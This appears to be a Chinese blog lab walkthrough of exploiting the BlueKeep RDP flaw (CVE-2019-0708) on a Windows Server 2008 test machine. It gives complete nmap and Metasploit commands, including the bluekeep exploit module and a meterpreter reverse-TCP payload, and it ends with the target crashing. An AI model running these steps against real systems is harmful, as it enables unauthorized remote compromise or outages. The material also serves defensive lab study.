当前位置: 首页 > news >正文

msfconsole利用Windows server2008cve-2019-0708漏洞入侵

一、环境搭建

Windows系列cve-2019-0708漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。

攻击机:kail系统    192.168.80.131

靶机:Windows server 2008系统   192.168.80.132

二、查看相关配置

Windows server 2008系统查看打开的端口

1.使用Windows + R打开运行框
2.netstat -an

3.若3389端口没有打开,可以右击计算机选择属性进行开启

三、利用Windows cve-2019-0708漏洞

本次漏洞利用使用kali自带的nmap扫描工具和metasploit渗透工具。

        Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞。

        nmap是用来探测计算机网络上的主机和服务的一种安全扫描器

1.在kali中使用nmap扫描目标机器端口确认是否开启3389端口:

nmap -sV  192.168.80.132

2.使用nmap查看存在的漏洞

nmap --script vuln 192.168.80.132

3.确认开启后,启动msfconsole

msfconsole

4.搜索漏洞:

search 0708

5.使用攻击模块

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

6.设置攻击目标

set rhosts 192.168.80.132set rport 3389

7.设置payload

set payload windows/x64/meterpreter/reverse_tcp   

8.设置攻击机 

set lhost 192.168.80.131# kail的IP地址set lport 4444# 端口设置为监听端口

9.输入:show  targets,显示可以选择的靶机架构 

10.选择target 5进行尝试 

set target 5  #选择靶机架构run  #进行执行

11.进行攻击 

四 、攻击结果

此时我们可以看到Windows server 2008系统出现蓝屏

五、总结

微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,堪比WannaCry。

相关文章:

  • c#未能加载基类System错误 这台计算机上缺少此项目引用的 NuGet 程序包
  • HikariCP连接池初识
  • 基于机器学习的锂电池RUL SOH预测
  • 【JavaScript脚本宇宙】表格大变身:探秘JavaScript库的数据表格魔法
  • 设计模式七大原则-单一职责原则SingleResponsibility
  • 卡码网用友提前批笔试 | 121 大数减法、122 滑动窗口最大值、117 软件架构
  • Selenium IDE 工具
  • Python框架scrapy有什么天赋异禀
  • 技术前沿 |【大模型InstructBLIP进行指令微调】
  • PostgreSQL的视图pg_tables
  • 【Java】Java流中的API
  • 通用信息提取数据预处理
  • MySQL——索引下推
  • Mysql基础-多表查询
  • 280 基于matlab的摇号系统GUI界面仿真MATLAB程序
  • 【391天】每日项目总结系列128(2018.03.03)
  • canvas实际项目操作,包含:线条,圆形,扇形,图片绘制,图片圆角遮罩,矩形,弧形文字...
  • Codepen 每日精选(2018-3-25)
  • css的样式优先级
  • EOS是什么
  • es6
  • extjs4学习之配置
  • Laravel 实践之路: 数据库迁移与数据填充
  • Netty 4.1 源代码学习:线程模型
  • php面试题 汇集2
  • Python3爬取英雄联盟英雄皮肤大图
  • React-redux的原理以及使用
  • Vue 动态创建 component
  • 包装类对象
  • 从零到一:用Phaser.js写意地开发小游戏(Chapter 3 - 加载游戏资源)
  • 缓存与缓冲
  • 前端相关框架总和
  • 数据结构java版之冒泡排序及优化
  • 微信小程序填坑清单
  • 小而合理的前端理论:rscss和rsjs
  • MPAndroidChart 教程:Y轴 YAxis
  • 组复制官方翻译九、Group Replication Technical Details
  • # Kafka_深入探秘者(2):kafka 生产者
  • # linux从入门到精通(三)
  • #define MODIFY_REG(REG, CLEARMASK, SETMASK)
  • (6)STL算法之转换
  • (Ruby)Ubuntu12.04安装Rails环境
  • (补充)IDEA项目结构
  • (动态规划)5. 最长回文子串 java解决
  • (附源码)springboot 基于HTML5的个人网页的网站设计与实现 毕业设计 031623
  • (回溯) LeetCode 78. 子集
  • (每日一问)基础知识:堆与栈的区别
  • (删)Java线程同步实现一:synchronzied和wait()/notify()
  • (十二)springboot实战——SSE服务推送事件案例实现
  • (小白学Java)Java简介和基本配置
  • (一)、python程序--模拟电脑鼠走迷宫
  • (转)母版页和相对路径
  • (转)全文检索技术学习(三)——Lucene支持中文分词
  • .NET MVC第三章、三种传值方式
  • .Net 基于.Net8开发的一个Asp.Net Core Webapi小型易用框架